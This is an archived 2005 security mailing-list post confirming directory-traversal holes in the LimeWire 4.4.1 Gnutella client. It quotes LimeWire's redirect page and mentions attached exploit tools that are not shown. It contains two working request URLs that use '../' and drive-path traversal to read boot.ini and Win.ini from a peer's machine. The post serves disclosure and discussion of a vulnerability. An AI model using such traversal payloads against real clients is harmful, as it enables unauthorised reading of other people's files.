|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Kevin Walsh: LimeWire Gnutella client two vulnerabilities
From: Ill will (xillwillx
gmail.com)
Date: Wed Mar 16 2005 - 13:39:43 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
using limewire version 4.4.1 on windows
192.168.1.2:6346/gnutella/res/c\:boot.ini
works perfectly fine
the magnet request
192.168.1.2/magnet10/../../../../../Windows/Win.ini?Simple-test
forwards you to a "fix" that they are using to patch all the new
version.. the simply put an index.html that meta-refresh forwards you
to their site
[html>
[head>
[title>Please Share</title>
[meta http-equiv="refresh"
content="0;
URL=http://www2.limewire.com/browser.htm">
[/head>
[body>
[a href="http://www2.limewire.com/browser.htm">Please Share[/a>
[/body>
[/html>
im also attaching to programs+ source i wrote that either allow you
to read the files from the console
or download the file itself from the user
--
- illwill
http://illmob.org
- application/rar attachment: limewire.rar
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]